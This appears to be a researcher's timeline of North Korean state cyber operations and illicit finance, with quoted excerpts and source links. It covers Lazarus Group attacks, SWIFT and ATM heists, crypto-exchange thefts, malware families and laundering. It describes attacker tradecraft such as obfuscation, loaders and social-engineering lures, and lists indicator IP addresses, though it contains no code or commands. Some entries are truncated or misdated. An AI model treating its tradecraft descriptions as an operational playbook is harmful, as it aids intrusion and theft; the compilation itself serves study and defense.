- Reported to be manufactured in the North Korea, the Supernote is a high-quality counterfeit of the 50-dollar and 100-dollar note, also known as a Superdollar. The notes are produced using similar processes and materials as genuine US currency.
- First detected back in 1989, over $50M have been found as of 2006.
- https://www.govinfo.gov/content/pkg/CHRG-109shrg28241/pdf/CHRG-109shrg28241.pdf
- A large scale DDoS attack on US and South Korean websites uses the MYDOOM and Dozer malware, which is suspected to have arrived in email messages. The malware places the text “Memory of Independence Day” in the Master Boot Record (MBR).
- Cyber-espionage campaign that utilized unsophisticated DDoS to target the South Korean govt
- http://news.bbc.co.uk/2/hi/asia-pacific/8142282.stm
- https://www.theguardian.com/world/2009/jul/11/south-korea-blames-north-korea-cyber-attacks
- “Ten Days of Rain” attack targets South Korean media, financial, and critical infrastructure targets. Compromised computers within South Korea are used to launch DDoS attacks.
- DarkSeoul: a wiper attack that targeted three South Korean broadcast companies, financial institutes, and an ISP
- At the time, two other groups going by the personas ″NewRomanic Cyber Army Team and WhoIs Team″, took credit for that attack
- Sony Pictures Entertainment (“SPE”) and its comedic film “The Interview,” which depicted a fictional Kim Jong-Un, the Chairman of the Workers’ Party of Korea and the “supreme leader” of North Korea
- Lazarus targeted individuals and entities associated with the production of “The Interview” and employees of SPE, sending them malware that the subjects used to gain unauthorized access to Sony's network
- Once inside Sony's network, the subjects stole movies and other confidential information, and then effectively rendered thousands of computers inoperable
- The same group of subjects also targeted individuals associated with the release of “The Interview,” among other victims.
- Perpetrators identified themselves as the Guardians of Peace.
- Large amounts of data were stolen and slowly leaked in the days following the attack.
- U.S. investigators say the culprits spent at least two months copying critical files
- The attack was conducted using malware. Server Message Block Worm Tool to conduct attacks
- Components of the attack included a listening implant, backdoor, proxy tool, destructive hard drive tool, and destructive target cleaning tool
- The components clearly suggest an intent to gain repeated entry, extract information, and be destructive, as well as remove evidence of the attack
- November 24, 2014 - malware previously installed rendered many Sony employees' computers inoperable by the software, with the warning by a group calling themselves the Guardians of Peace, along with a portion of the confidential data taken during the hack.
- Several Sony-related Twitter accounts were also taken over
- Park was a North Korean hacker that worked for the country's Reconnaissance General Bureau, the equivalent of the
- The US DOJ also asserted that Park was partially responsible for arranging WannaCry, having developed part of the ransomware software
- https://en.wikipedia.org/wiki/Sony_Pictures_hack
- https://www.fbi.gov/news/pressrel/press-releases/update-on-sony-investigation
- Variants of the malware used in the Sony Pictures hack were found in attacks which targeted the websites of North Korean research and governmental organizations, and the South Korean defence industry.
- AhnLab refers to these attacks – which occurred from 2014 to 2015 – as Operation Red Dot. The variants in this operation share similar code and names, such as AdobeArm.exe and msnconf.exe.
- The main infection methods are: executable files disguised as document files (HWP, PDF), disguised installers, and exploits of Hangul Word Processor (HWP) file vulnerabilities.
- The document files, which are listed in Table 3, are decoys disguised as legitimate documents, such as address books, deposit slips and invitations to lure victims into opening them.
- https://www.virusbulletin.com/virusbulletin/2018/11/vb2018-paper-hacking-sony-pictures/
- Banco del Austro (BDA) in Ecuador instructed San Francisco-based Wells Fargo to transfer money to bank accounts in Hong Kong.
- https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/ecuadorean-bank-loses-12m-via-swift
- https://www.reuters.com/article/us-cyber-heist-swift-specialreport-idUSKCN0YB0DD
- By March the hackers had a backdoor to teh bank's electronic communication system allowing them to send messages to one another in a way that mimicked the bank’s encrypted-communication protocols, and did not alert security to their presence.
- Attempts from 2015 through 2019 to steal more than $1.2 billion from banks in Vietnam, Bangladesh, Taiwan, Mexico, Malta, and Africa by hacking the banks’ computer networks and sending fraudulent SWIFT messages.
2015: Sony Pictures Hack - Intrusion into Mammoth Screen, producer of a fictional series involving a British nuclear scientist taken prisoner in DPRK
- Joint, two-year-long effort between Kaspersky Lab, AlienVault, Symantec, Invincea, ThreatConnect, Volexity, and PunchCyber
- https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
- The attacks were focused on banking infrastructure and staff, exploiting vulnerabilities in commonly used software or websites, bruteforcing passwords, using keyloggers and elevating privileges. However, the way banks use servers with SWIFT software installed requires personnel responsible for the administration and operation. Sooner or later, the attackers find these personnel, gain the necessary privileges, and access the server connected to the SWIFT messaging platform. With administrative access to the platform they can manipulate software running on the system as they wish. There is not much that can stop them, because from a technical perspective, their activities may not differ from what an authorized and qualified engineer would do: starting and stopping services, patching software, modifying the database.
- https://en.wikipedia.org/wiki/Bangladesh_Bank_robbery
- https://securelist.com/lazarus-under-the-hood/77908/
- https://www.reuters.com/investigates/special-report/cyber-heist-federal/
- https://www.reuters.com/article/us-usa-fed-bangladesh-malware-idUSKCN0WD1EV/
2015-2018: Engaged in computer intrusions and cyber-heists at many financial services victims in the United States, and in other countries in Europe, Asia, Africa, North America, and South America in 2015, 2016, 2017, and 2018, with attempted losses well over $1 billion.
2016-05-14: FASTCash - $16M dollars was withdrawn from roughly 1700 7-Eleven A.T.M.s across Japan using data stolen from South Africa’s Standard Bank
- Vietnam’s Tien Phong Bank said that it interrupted an attempted cyber heist that involved the use of fraudulent SWIFT messages, just like the Bangladesh Bank Heist
- https://www.reuters.com/article/us-vietnam-cybercrime-idUSKCN0Y60EN
2016-05-26: SWIFT Heists Symantec has found evidence that a bank in the Philippines has also been attacked by the group that stole US$81 million from the Bangladesh central bank
- https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=8ae1ff71-e440-4b79-9943-199d0adb43fc&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments
- Symantec has found evidence that a bank in the Philippines has also been attacked by the group that stole US$81 million from the Bangladesh central bank and attempted to steal over $1 million from the Tien Phong Bank in Vietnam.
- Malware used by the group was also deployed in targeted attacks against a bank in the Philippines. In addition to this, some of the tools used share code similarities with malware used in historic attacks linked to a threat group known as Lazarus. The attacks can be traced back as far as October 2015, two months prior to the discovery of the failed attack in Vietnam, which was hitherto the earliest known incident.
- The attack against the Bangladesh central bank triggered an alert by payments network SWIFT, after it was found the attackers had used malware to cover up evidence of fraudulent transfers. SWIFT issued a further warning, saying that it had found evidence of malware being used against another bank in a similar fashion. Vietnam’s Tien Phong Bank subsequently stated that it intercepted a fraudulent transfer of over $1 million in the fourth quarter of last year. SWIFT concluded that the second attack indicates that a “wider and highly adaptive campaign” is underway targeting banks.
- A third bank, Banco del Austro in Ecuador, was also reported to have lost $12 million to attackers using fraudulent SWIFT transactions. However, no details are currently known about the tools used in this incident or if there are any links to the attacks in Asia.
- Symantec has identified three pieces of malware which were being used in limited targeted attacks against the financial industry in South-East Asia: Backdoor.Fimlis, Backdoor.Fimlis.B, and Backdoor.Contopee. At first, it was unclear what the motivation behind these attacks were, however code sharing between Trojan.Banswift (used in the Bangladesh attack used to manipulate SWIFT transactions) and early variants of Backdoor.Contopee provided a connection.
- https://www.anomali.com/blog/evidence-of-stronger-ties-between-north-korea-and-swift-banking-attacks
2016-2020: Multiple spear-phishing campaigns targetting employees of US defense contractors, energy companies, aerospace companies, technology companies, the U.S.Department of State, and the U.S. Department of Defense
- which included documents known as Operational Plan 5015—a detailed analysis of how a war with the country’s northern neighbor might proceed, and, notably, a plot to “decapitate” North Korea by assassinating Kim Jong Un. The breach was so egregious that Kim Tae-woo, a former president of the Korea Institute for National Unification, a think tank in Seoul, told the Financial Times, “Part of my mind hopes the South Korean military intentionally leaked the classified documents to the North with the intention of having a second strategy.”
- Lazarus is not just another APT actor. The scale of the Lazarus operations is shocking. It has been on a spike since 2011.
- All those hundreds of samples that were collected give the impression that Lazarus is operating a factory of malware, which produces new samples via multiple independent conveyors.
- We have seen them using various code obfuscation techniques, rewriting their own algorithms, applying commercial software protectors, and using their own and underground packers.
- Lazarus knows the value of quality code, which is why we normally see rudimentary backdoors being pushed during the first stage of infection. Burning those doesn’t impact the group too much. However, if the first stage backdoor reports an interesting infection they start deploying more advanced code, carefully protecting it from accidental detection on disk. The code is wrapped into a DLL loader or stored in an encrypted container, or maybe hidden in a binary encrypted registry value. It usually comes with an installer that only attackers can use, because they password protect it. It guarantees that automated systems – be it a public sandbox or a researcher’s environment – will never see the real payload.
- Most of the tools are designed to be disposable material that will be replaced with a new generation as soon as they are burnt. And then there will be newer, and newer, and newer versions. Lazarus avoids reusing the same tools, same code, and the same algorithms. “Keep morphing!” seems to be their internal motto.
- Those rare cases when they are caught with same tools are operational mistakes, because the group seems to be so large that one part doesn’t always know what the other is doing.
- https://securelist.com/lazarus-under-the-hood/77908/
- https://www.csoonline.com/article/560979/kaspersky-lab-reveals-direct-link-between-banking-heist-hackers-and-north-korea.html
- This DHS-FBI Joint Technical Alert provides information, including IOCs on the ransomware variant known as WannaCry. The U.S. Government publicly attributed this WannaCry ransomware variant to the North Korean government.
- https://www.malwaretech.com/2017/05/how-to-accidentally-stop-a-global-cyber-attacks.html
- Creation of the destructive WannaCry 2.0 ransomware in May 2017
- The extortion and attempted extortion of victim companies from 2017 through 2020 involving the theft of sensitive data and deployment of other ransomware.
- https://www.justice.gov/opa/pr/three-north-korean-military-hackers-indicted-wide-ranging-scheme-commit-cyberattacks-and
- https://arstechnica.com/tech-policy/2017/12/trump-administration-formally-blames-north-korea-for-wannacry-now-what/
- https://arstechnica.com/information-technology/2017/05/theres-new-evidence-tying-wcry-ransomware-worm-to-prolific-hacking-group/
- https://arstechnica.com/gadgets/2017/08/wannacry-operator-empties-bitcoin-wallets-connected-to-ransomware/
- https://arstechnica.com/gadgets/2017/08/researchers-say-wannacry-operator-moved-bitcoins-to-untraceable-monero/
- https://www.group-ib.com/blog/lazarus/
- 210.52.109.22 - China Netcom, 210.52.109.0/24 is assigned to North Korea
- 175.45.178.222 - Natinal Defence Commission
- 175.45.178.19 - Ghost RAT
- 175.45.178.97 - Ghost RAT
2017-04-22 – Four wallets on Yapizon, a South Korean cryptocurrency exchange, are compromised. (It is worth noting that at least some of the tactics, techniques, and procedures were reportedly employed during this compromise were different than those we have observed in following intrusion attempts and as of yet there are no clear indications of North Korean involvement).
2017-04-26 – The United States announces a strategy of increased economic sanctions against North Korea. Sanctions from the international community could be driving North Korean interest in cryptocurrency, as discussed earlier.
2017-06-01 – More suspected North Korean activity targeting unknown victims, believed to be cryptocurrency service providers in South Korea.
2017-06-13: CISA's report on HIDDEN COBRA – North Korea’s DDoS Botnet Infrastructure
- This Joint Technical Alert provides technical details on the tools and infrastructure used by cyber actors of the North Korean government to target the media, aerospace, financial, and critical infrastructure sectors in the United States and globally. Working with U.S. government partners, DHS and FBI identified Internet Protocol addresses associated with a malware variant, known as DeltaCharlie, used to manage North Korea’s DDoS botnet infrastructure.
2017-06-13: US-CERT's HIDDEN COBRA – North Korea’s DDoS Botnet Infrastructure
2017-08-14: Unit42 has discovered ongoing attack targeting individuals involved with US defense contracts links back to perportrators of the Sony Pictures Hack.
- Most notably, decoy document themes now include job role descriptions and internal policies from US defense contractors.
- https://unit42.paloaltonetworks.com/unit42-blockbuster-saga-continues/
- https://unit42.paloaltonetworks.com/unit42-the-blockbuster-sequel/
- STIX file for MAR 10132963. This MAR examines the functionality of the DeltaCharlie malware variant to manage North Korea’s distributed denial-of-service (DDOS) botnet infrastructure (refer to TA17-164A). DHS distributed this MAR to enable network defense and reduce exposure to any North Korean government malicious cyber activity.
- CISA Alert TA17-318A: HIDDEN COBRA – North Korean Remote Administration Tool: FALLCHILL
- CISA Alert TA17-318B: HIDDEN COBRA – North Korean Trojan: Volgmer
- These Joint Technical Alerts provide information and IOCs on malware variants used by the North Korean government to maintain a presence on victims’ networks and to further network exploitation. DHS and FBI distributed these alerts to enable network defense and reduce exposure to any North Korean government malicious cyber activity.
- STIX file for MAR 10135536
- DHS and FBI identified a Trojan malware variant—referred to as BANKSHOT—used by the North Korean government. This MAR analyzes three malicious executable files.
- Two files are 32-bit Windows executables that function as Proxy servers and implement a Fake TLS method.
- The third file is an Executable Linkable Format file designed to run on Android platforms as a fully functioning Remote Access Trojan.
- AR 10135536-F: North Korean Trojan: HARDRAIN
- STIX file for MAR 10135536-F
- DHS and FBI identified a Trojan malware variant—referred to as HARDRAIN—used by the North Korean government.
- MAR 10135536.11: North Korean Trojan: SHARPKNOT
- STIX file for MAR 10135536.11
- DHS and FBI identified a Trojan malware variant—referred to as SHARPKNOT—used by the North Korean government. SHARPKNOT is a 32-bit Windows executable file. When executed from the command line, the malware overwrites the Master Boot Record and deletes files on the local system, any mapped network shares, and physically connected storage devices.
- https://www.welivesecurity.com/2018/04/03/lazarus-killdisk-central-american-casino/
- Our analysis shows that the cybercriminals behind the attack against an online casino in Central America, and several other targets in late-2017, were most likely the infamous Lazarus hacking group. In all of these incidents the attackers utilized similar toolsets, including KillDisk; the disk-wiping tool that was executed on compromised machines.
- Some of the past attacks attributed to the Lazarus Group attracted the interest of security researchers who relied on Novetta et al’s white papers with hundreds of pages describing the tools used in the attacks – the Polish and Mexican banks; the WannaCryptor outbreak; phishing campaigns against US defense contractors, etc – and provides grounds for the attribution of these attacks to the Lazarus Group.
- Our analysis of these two Win32/KillDisk.NBO variants revealed that they share many code similarities. Further, they are almost identical to the KillDisk variant used against financial organizations in Latin America, as described by Trend Micro.
- One of the variants was protected using the commercial PE protector VMProtect in its 3rd generation, which made unpacking it trickier. The attackers most likely did not buy a VMProtect license but have rather used leaked or pirated copies available on the Internet. Using protectors is common for the Lazarus group: during the Polish and Mexican attacks in February 2017, they made use of Enigma Protector and some of the Operation Blockbuster samples, reported by Palo Alto Networks, used an older version of VMProtect.
- This recent attack against an online casino in Central America suggests that hacking tools from the Lazarus toolset are recompiled with every attack (we didn’t see these exact samples anywhere else). The attack itself was very complex, consisted of several steps, and involved tens of protected tools that, being stand-alone, would reveal little from their dynamics.
- Utilizing KillDisk in the attack scenario most likely served one of two purposes: the attackers covering their tracks after an espionage operation, or it was used directly for extortion or cyber-sabotage. In any case, the fact that ESET products detected the malware on over 100 endpoints and servers in the organization signifies a large-scale effort of the attackers.
2018-04-25: SWIFT is aware of a malware that aims to reduce financial institutions’ abilities to evidence fraudulent transactions on their local systems. Contrary to reports that suggest otherwise, this malware has no impact on SWIFT’s network or core messaging services.
2018-05-29: CISA's analysis of HIDDEN COBRA – Joanap Backdoor Trojan and Brambul Server Message Block Worm
- CISA Alert TA18-149A: HIDDEN COBRA – Joanap Backdoor Trojan and Brambul Server Message Block Worm
- MAR 10135536-3: HIDDEN COBRA RAT/Worm
- This Joint Technical Alert and MAR authored by DHS and FBI provides information, including IOCs associated with two families of malware used by the North Korean government: A remote access tool, commonly known as Joanap; and Server Message Block worm, commonly known as Brambul.
- analysts discovered that the code is actually a modified version of the Buhtrap malware component known as kill_os. The module renders the local operating system and the Master Boot Record (MBR) unreadable by erasing them.
- https://threatpost.com/banco-de-chile-wiper-attack-just-a-cover-for-10m-swift-heist/132796/
- AR 10135536-12
- DHS and FBI identified a Trojan malware variant—referred to as TYPEFRAME—used by the North Korean government. DHS and FBI distributed this MAR to enable network defense and reduce exposure to North Korean government malicious cyber activity. This malware report contains an analysis of multiple malware samples consisting of 32-bit and 64-bit Windows executable files and a malicious Microsoft Word document that contains Visual Basic for Applications macros.
- AR 10135536-17
- DHS and FBI identified a Trojan malware variant—referred to as KEYMARBLE—used by the North Korean government. KEYMARBLE is a RAT capable of accessing device configuration data, downloading additional files, executing commands, modifying the registry, capturing screen shots, and exfiltrating data.
- Nathan P. Shields, FBI, Los Angeles Field Office
- Park worked for front company Chosun Expo Joint Venture aka Korea Expo Joint Venture” aka “Chosun Expo
- https://documentcloud.org/documents/4834226-2018-09-06-PARK-COMPLAINT-UNSEALED.html
- https://www.justice.gov/opa/pr/north-korean-regime-backed-programmer-charged-conspiracy-conduct-multiple-cyber-attacks-and
- Author:: FireEye
- https://fireeye.com/blog/threat-research/2018/10/apt38-details-on-new-north-korean-regime-backed-threat-group.html
2018-10-02: CISA's analysis of HIDDEN COBRA FASTCash Campaign
- MAR 10201537: HIDDEN COBRA FASTCash-Related Malware
- CISA, Treasury, FBI, and U.S. Cyber Command identified malware and other IOCs used by the North Korean government in an ATM cash-out scheme—referred to by the U.S. Government as “FASTCash.” The Joint Technical Alert provides information on FASTCash and the MAR provides information on 10 malware samples related to this activity.
- https://www.cisa.gov/news-events/alerts/2018/10/02/hidden-cobra-fastcash-campaign
2018-10-25 - Lazarus Group Shifting Patterns in Internet Use Reveal Adaptable and Innovative North Korean Ruling Elite
-
Developed custom PowerShell scripts that communicate with malicious C2 servers and execute commands from the operator. The C2 server script names are disguised as WordPress (popular blog engine) files as well as those of other popular open source projects.
- https://securelist.com/cryptocurrency-businesses-still-being-targeted-by-lazarus/90019/
2018-2017: According to the Treasury, NK affiliated hackers “likely” stole ~$571 million in cryptocurrency from five Asian exchanges in 2017 and 2018.
- 2018-09: Indonesian Crypto Company Theft - $24.9M
- 2018-06: Bithumb2 CEX Hack - Lazarus - $30M
- 2017-12: YouBit CEX Hack (previously known as Yapizon)
- 2017-04: Yapizon CEX Hack - 3831 BTC
2018-2020: Multiple malicious cryptocurrency applications which would provide the North Korean hackers a backdoor into the victims’ computers.
- from March 2018 through at least September 2020:
- Celas Trade Pro WorldBit-Bot iCryptoFx Union Crypto Trader Kupay Wallet CoinGo Trade Dorusio CryptoNeuro Trader and Ants2Whale
- which would provide the North Korean hackers a backdoor into the victims’ computers.
2018: Operation AppleJeus research highlighted Lazarus’s focus on cryptocurrency exchanges utilizing a fake company with a backdoored product aimed at cryptocurrency businesses
- New ability to target macOS.
- Infected with malware after installing a legitimate-looking trading application called Celas Trade Pro from Celas Limited showed no signs of malicious behaviour and looked genuine. Malware delivered via update files in app. User installed this program via a download link delivered over email.
- For macOS users, Celas LLC also provided a native version of its trading app. A hidden “autoupdater” module is installed in the background to start immediately after installation, and after each system reboot.
- https://securelist.com/operation-applejeus/87553/
2019-01-30: 200 North Korean hacker organizations dispatched overseas, each team sending up to $1 million to North Korea
- MAR 10135536-21: North Korean Proxy Malware: ELECTRICFISH Note: this version of the ELECTRICFISH MAR updates the May 9, 2019 version.
- MAR 10135536-10: North Korean Trojan: BADCALL Note: this version of the BADCALL MAR updates the February 6, 2018 version: and STIX file.
- CISA, FBI, and DoD identified multiple malware variants used by the North Korean government.
- ELECTRICFISH implements a custom protocol that allows traffic to be tunneled between a source and a destination Internet Protocol (IP) address.
- BADCALL malware is an executable that functions as a proxy server and implements a Fake TLS method.
- https://greatgameindia.com/kudankulam-nuclear-power-plant-hit-by-cyberattack/
- Kaspersky Global Research and Analysis Team have discovered a previously unknown spy tool, which had been spotted in Indian financial institutions and research centers. Called Dtrack, this spyware reportedly was created by the Lazarus group and is being used to upload and download files to victims’ systems, record key strokes and conduct other actions typical of a malicious remote administration tool (RAT).
- In 2018, Kaspersky researchers discovered ATMDtrack – malware created to infiltrate Indian ATMs and steal customer card data. Following further investigation using the Kaspersky Attribution Engine and other tools, the researchers found more than 180 new malware samples that had code sequence similarities with the ATMDtrack, but at the same time were not aimed at ATMs. Instead, its list of functions defined it as spy tools, now known as Dtrack.
- Moreover, not only did the two strains share similarities with each other, but also with the 2013 DarkSeoul campaign, which was attributed to Lazarus – an infamous advanced persistence threat actor responsible for multiple cyberespionage and cyber sabotage operations.
2019-11-04: Indian Nuclear Power Plant Attack We have long known and continuously monitored North Korea is attacking India
- https://twitter.com/issuemakerslab/status/1191519079514796032
- This is an image of the history of malware used by the North Korean hacker group B that hacked the Kudankulam Nuclear Power Plant(KKNPP) in India. A 16-digit string dkwero38oerA^t@# is the password that malware uses to compress a list of files on an infected PC.
- https://twitter.com/issuemakerslab/status/1190846548415959040
2020-02-14: CISA's analysis of North Korean Trojans BISTROMATH, SLICKSHOES, CROWDEDFLOUNDER, HOTCROISSANT, ARTFULPIE, BUFFETLINE, HOPLIGHT
- Note: this version of HOPLIGHT MAR updates the October 31, 2019 version, which updated April 10, 2019 version.
- BISTROMATH looks at multiple versions of a full-featured Remote Access Trojan implant executable and multiple versions of the CAgent11 GUI implant controller/builder.
- SLICKSHOES is a Themida-packed dropper that decodes and drops a Themida-packed beaconing implant.
- CROWDEDFLOUNDER looks at Themida packed Windows executable.
- HOTCROSSIANT is a full-featured beaconing implant.
- ARTFULPIE is an implant that performs downloading and in-memory loading and execution of a DLL from a hardcoded URL.
- BUFFETLINE is a full-featured beaconing implant.
- HOPLIGHT looks at multiple malicious executable files. Some of which are proxy applications that mask traffic between the malware and the remote operators.
- Two of the usernames adopted were “snowsjohn” and “khaleesi”. Between July 2018 and April 2019, they handled $100,812,842.54 in cryptocurrency transactions which were linked back to the $250m heist on the crypto exchange.
- https://www.wired.co.uk/article/north-korea-cryptocurrency-hacking-china
- https://www.mandiant.com/resources/unc2891-overview
- UNC2891 intrusions appear to be financially motivated and in some cases spanned several years through which the actor had remained largely undetected.
- Mandiant discovered a previously unknown rootkit for Oracle Solaris systems that UNC2891 used to remain hidden in victim networks, we have named this CAKETAP.
- Mandiant expects that UNC2891 will continue to capitalize on this and perform similar operations for financial gain that target mission critical systems running these operating systems.
- The U.S. Departments of State, Treasury, and Homeland Security and FBI issued this Advisory as a comprehensive resource on the North Korean cyber threat for the international community, network defenders, and the public. The Advisory highlights the cyber threat posed by North Korea and provides recommended steps to mitigate the threat.
- MAR 1028834-1.v1: North Korean Remote Access Tool: COPPERHEDGE
- MAR 1028834-2.v1: North Korean Trojan: TAINTEDSCRIBE
- MAR 1028834-3.v1: North Korean Trojan: PEBBLEDASH
- CISA, FBI, and DoD identified three malware variants used by the North Korean government.
- COPPERHEDGE is Manuscrypt family of malware is used by APT cyber actors in the targeting of cryptocurrency exchanges and related entities. Manuscrypt is a
- TAINTEDSCRIBE and PEBBLEDASH are full-featured beaconing implants.
- CISA, FBI, and the broader U.S. Government authored a Joint Alert with details on vulnerabilities routinely exploited by foreign cyber actors, including North Korean cyber actors.
2020-05-28: USA Chargees 28 North Koreans and 5 Chinese citizens with laundering more than $2.5 billion in assets to help fund North Korea’s nuclear weapons
- Bringing criminal charges against 28 North Korean and 5 Chinese nationals for conspiring to violate DPRK and proliferation sanctions.
- https://int.nyt.com/data/documenthelper/6971-north-korea-indictment/422a99ddac0c39459226/optimized/full.pdf#page=1
- https://www.europeansanctions.com/2020/05/us-charges-33-with-violating-n-korea-wmd-sanctions/
- https://www.nknews.org/2020/05/doj-accuses-north-koreans-of-multi-year-2-5-billion-money-laundering-scheme/
- https://edition.cnn.com/2020/05/28/politics/north-korean-bankers-charges-money-laundering/index.html
- initial access was achieved through opportunistic exploitation of a vulnerable VPN gateway. After that, the attackers obtained administrative privileges, deployed a backdoor on the compromised system and were able to take over the Active Directory server.
- https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
- According to the complaint, the four companies laundered U.S. dollars on behalf of sanctioned North Korean banks and helped those banks to illegally access the U.S. financial market.
- The complaint lists one source of the laundered funds as a DPRK entitity involved in the banned sales of North Korean coal. The laundered funds were used to purchase Russian pretroleum products and nuclear and missile components for the DPRK and to aid multiple cover branches of the DPRK’s Foreign Trade bank, which the U.S. Treasury Department had sanctioned for “facilitating transactions on behalf of actors linked to the DPRK’s proliferation network”.
- https://www.justice.gov/opa/pr/united-states-files-complaint-forfeit-more-237-million-companies-accused-laundering-funds
- From at least February 2017 to May 2018 and beyond, Yang Ban deceived banks in the U.S. into processing transactions for North Korean customers of Yang Ban.
- It used front companies and created false sets of invoices and shipping records to conceal that the ultimate destination of shipments were customers in the DPRK. These practices helped Yang Ban circumvent “banks’ sanction and anti-money laundering filters” thus “duping U.S. correspondent banks into processing U.S. dollar transactions that they would not otherwise have authorized.”
- Yang Ban specifically admitted to conspiring with SINSMS (a company subsequently designated by U.S. sanctions) and others, “to conceal the North Korean nexus” by falsifying shipping records and by other means.
- The company will pay a financial penalty totaling $673,714 (USD) and has “agreed to implement rigorous internal controls and to cooperate fully with the Justice Department, including by reporting any criminal conduct by an employee”.
- https://www.justice.gov/opa/pr/company-pleads-guilty-money-laundering-violation-part-scheme-circumvent-north-korean
- https://www.nknews.org/2020/09/company-pleads-guilty-to-helping-north-korea-illegally-use-us-banking-system
- Widespread North Korean Espionage Campaign
- It succeeded in infecting several dozens of companies and organizations in Israel and globally
- Main targets: defense, governmental companies, and specific employees of those companies
- We assess this to be this year’s main offensive campaign by the Lazarus group
- The infection and infiltration of target systems had been carried out through a widespread and sophisticated social engineering campaign, which included: reconnaissance, creation of fictitious LinkedIn profiles, sending emails to the targets’ personal addresses, and conducting a continuous dialogue with the target – directly on the phone, and over WhatsApp
- Upon infection, the attackers collected intelligence regarding the company’s activity, and also its financial affairs, probably in order to try and steal some money from it
- The double scenario of espionage and money theft is unique to North Korea, which operates intelligence units that steal both information and money for their country.
- https://www.clearskysec.com/operation-dream-job/
- https://www.clearskysec.com/wp-content/uploads/2020/08/Dream-Job-Campaign.pdf
- CISA and FBI have identified a malware variant—referred to as BLINDINGCAN—used by North Korean actors. FBI has high confidence that HIDDEN COBRA actors are using malware variants in conjunction with proxy servers to maintain a presence on victim networks and to further network exploitation. A threat group with a nexus to North Korea targeted government contractors early this year to gather intelligence surrounding key military and energy technologies.
2020-08-25: DPRK-aligned threat actor targeting cryptocurrency vertical with global hacking campaign
- MAR 10301706-1.v1: North Korean Remote Access Tool: ECCENTRICBANDWAGON
- MAR 10301706-2.v1: North Korean Remote Access Tool: VIVACIOUSGIFT
- MAR 10257062-1.v2: North Korean Remote Access Tool: FASTCASH for Windows
- CISA, the Department of the Treasury, FBI, and U.S. Cyber Command released a joint Technical Alert and three MARs on the North Korean government’s ATM cash-out scheme—referred to by the U.S. Government as “FASTCash.”
- https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-239a
- These actors stole millions of dollars’ worth of cryptocurrency and ultimately laundered the funds through Chinese over-the-counter (OTC) cryptocurrency traders.
- https://blog.chainalysis.com/reports/lazarus-group-north-korea-doj-complaint-august-2020/
- https://justice.gov/usao-dc/pr/united-states-files-complaint-forfeit-280-cryptocurrency-accounts-tied-hacks-two
2020-09-02: Chainalysis: report regarding Lazarus Group on-chain activity and the recent US DOJ civil forfeiture of 280 cryptocurrency addresses
- It includes malware indicators, techniques and tactics
- https://labs.f-secure.com/assets/BlogFiles/f-secureLABS-tlp-white-lazarus-threat-intel-report2.pdf
2020-09-20: US DOJ: Lazarus Group developed multiple malicious crypto applications from March 2018 through at least September 2020. Such apps include Celas Trade Pro, Worldbit-bot, icryptofx, Union Crypto Trader, Kupay Wallet, Coingo Trade, Dorusio, Cryptoneuro Trader, and Ants2whale.
- An employee of the pharmaceutical company received a document named GD2020090939393903.doc with a job offer (creation date: 2020:09:22 03:08:00).
- After a short period of time, another employee received a document named GD20200909GAB31.doc with a job offer from the same company (creation date: 2020:09:14 07:50:00). By opening the documents from a potential employer, both victims activated malicious macros on their home computers
- In one of the cases, a malicious document was received via Telegram. Note that both documents were received by the victims over the weekend.
- At the same time, by performing reconnaissance on the computers available, the attackers received new vectors for penetration into the company's corporate network. So, two days later, after the company's network infrastructure was compromised, another employee from another branch received a job offer. On the social network LinkedIn, the victim was contacted by a user named Rob Wilson, shortly after which she received an email with a job offer from General Dynamics UK.
- The compromised user also forwarded the malicious email to her colleague. However, the recipient did not open the malicious document and did not allow the attackers to expand the attack surface.
- In this campaign, attackers, under the guise of the HR service of General Dynamics Mission Systems, sent documents with malicious macros containing a stub text with a job offer through LinkedIn Messages, Telegram, WhatsApp, and corporate email.
- CISA, FBI, and the U.S. Cyber Command Cyber National Mission Force (CNMF) released a new Joint Cybersecurity Advisory on TTPs used by North Korean APT group Kimsuky.
- Stayed in their systems for months on end
- Contacted in Feb 2020
- Payload delivered in Q2/Q3
- Data exif Q2 Q3 Q4 2020
- By using spear-phishing methods, members of Lazarus Group acted as health officials and reached out to a number of pharmaceutical companies. Once trust was gained, Lazarus Group sent a number of malicious links to the companies. It is unconfirmed what the goal of the attack was, but it is suspected that they were looking to sell data for profit, extort the companies and their employees, and give foreign entities access to proprietary COVID-19 Research.
- https://www.hvs-consulting.de/public/ThreatReport-Lazarus.pdf
- https://go.chainalysis.com/rs/503-FAP-074/images/Crypto-Crime-Report-2022.pdf
- North Korean cybercriminals had a banner year in 2021, launching at least seven attacks on cryptocurrency platforms that extracted nearly $400M worth of digital assets last year.
- These attacks targeted primarily investment firms and centralized exchanges, and made use of phishing lures, code exploits, malware, and advanced social engineering to siphon funds out of these organizations’ internet-connected “hot” wallets into DPRK-controlled addresses.
- Once North Korea gained custody of the funds, they began a careful laundering process to cover up and cash out. These complex tactics and techniques have led many security researchers to characterize cyber actors for the Democratic People’s Republic of Korea (DPRK) as advanced persistent threats (APTs). This is especially true for APT 38, also known as “Lazarus Group,” which is led by DPRK’s primary intelligence agency, the US- and UN-sanctioned Reconnaissance General Bureau.
- While we will refer to the attackers as North Korean-linked hackers more generally, many of these attacks were carried out by the Lazarus Group in particular. Lazarus Group first gained notoriety from its Sony Pictures and WannaCry cyberattacks, but it has since concentrated its efforts on cryptocurrency crime—a strategy that has proven immensely profitable.
- From 2018 on, the group has stolen and laundered massive sums of virtual currencies every year, typically in excess of $200M. The most successful individual hacks, one on KuCoin and another on an unnamed cryptocurrency exchange, each netted more than $250M alone.
- Interestingly, in terms of dollar value, Bitcoin now accounts for less than one fourth of the cryptocurrencies stolen by DPRK.
- In 2021, only 20% of the stolen funds were Bitcoin, whereas 22% were either ERC-20 tokens or altcoins. And for the first time ever, Ether accounted for a majority of the funds stolen at 58%.
- The growing variety of cryptocurrencies stolen has necessarily increased the complexity of DPRK’s cryptocurrency laundering operation. Today, DPRK’s typical laundering process is as follows:
- More than 65% of DPRK’s stolen funds were laundered through mixers this year, up from 42% in 2020 and 21% in 2019, suggesting that these threat actors have taken a more cautious approach with each passing year.
